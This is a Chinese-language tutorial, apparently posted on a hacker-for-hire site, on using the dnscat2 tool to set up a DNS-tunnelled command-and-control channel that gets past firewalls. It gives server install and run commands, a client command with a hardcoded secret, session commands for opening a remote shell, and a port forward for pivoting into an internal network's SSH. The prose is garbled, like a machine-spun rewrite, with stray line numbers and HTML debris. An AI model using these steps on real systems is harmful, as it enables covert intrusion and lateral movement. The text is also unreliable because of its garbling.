DNS协议书绕开服务器防火墙

hacker5年前 (2020-06-06)关于黑客接单950

今日给大伙儿产生的是怎样根据DNS协议书绕开服务器防火墙，期待对网站渗透很感兴趣的盆友可以喜爱，下边大家立即刚开始实例教程，不奢侈浪费大伙儿珍贵的時间。

					 
Default

								1

								2

								3

								ubuntu 14.04 root客户

								windows7 x64 user客户

**0x01自然环境提前准备**

 
Default

								1

								2

								3

								4

								5

								6

								7

								8

								apt-get update

								apt-get -y install ruby-dev git make g  

								gem install bundler
git clone https://github.com/iagox86/dnscat2.git
								cd dnscat2/server

								#改动Gemfile source 'https://ruby.taobao.org/'

								bundle install

或是根据docker安裝

					 
Default

								1

								2

								3

								4

								5

								6

								7

								apt-get install docker.io

								service docker status

								service docker start

								cd ~/dnscat2/server

								#改动Gemfile source 'https://ruby.taobao.org/'

								docker build .

安裝进行以后，将会在docker images 见到这一镜像系统没有名字，大家改动一下 docker tag IMAGEID mpercival/dnscat2

**0x02运用全过程**

server端

					 
Default

								1

								2

								3

								4

								cd dnscat2/server

								ruby ./dnscat2.rb

								#docker客户  docker run -p 53:53/udp -it --rm mpercival/dnscat2 ruby ./dnscat2.rb

全自动文稿

能够根据二种 *** 设定C&C详细地址，要是没有网站域名得话，立即出外网VPS运作ruby ./dnscat2.rb 有网站域名的朋友，先设定好NS *** 服务器将NS纪录改动为当今的设备。随后根据ruby ./dnscat2.rb yourdomain 我这里应用的IP地址

client端

将dnscat2文件夹名称下边的client编译程序好成exe，随后上传入client端

					 
Default

								1

								2

								dnscat2.exe --dns=server=server端ip --secret=c2c6d04cab68ee2947d80316858da0f8

						<
/div>

全自动文稿
因为在最新版本的dnscat2是数据加密的因此我们在手机客户端实行的情况下要再加密匙，要不然没法恰当的创建联接

怎样根据DNS协议书绕开服务器防火墙获得shell

					 
Default

								1

								2

								3

								4

								session -i 1 #转换到session 1

								help #根据help能够 见到适用的指令

								shell  #实行以后会新转化成一个session  必须根据session -i 2 切过去

全自动文稿
那样就取得成功获得了一个shell，我们可以根据数据文件看一下

数据信息全是根据DNS传出去的，而且是数据加密过的，由于在最开始的dnscat2的版本号中，数据信息仅仅简易的hex编码。到最新版本的默认设置就早已数据加密

根据Salsa20加密技术开展了数据加密，假如不清楚密匙，就基本上不可以破译数据文件了。除开一般的反跳shell和网页上传文档作用，还有一个较为有效的作用
能够根据dnscat2完成DNS隧道施工，随后开展内网渗透。在取得成功获得一个session以后实行

					 
Default

								1

								2

								3

								session -i id

								listen 4444 10.211.55.19:22 #将内部网10.211.55.19的22端口分享到当地的4444

随后立即ssh当地的ip的4444端口号

留意的是我的docker自然环境，因此是立即ssh的docker的ip
今日的怎样根据DNS协议书绕开服务器防火墙实例教程到这儿就需要告一段落，对网站渗透很感兴趣的盆友能够关心大家哦，下一期给大伙儿产生的是 *** 黑客必需武器，拥有称手的黑客工具，针对一个 *** 黑客网站渗透测试而言，高效率能够进一步提高。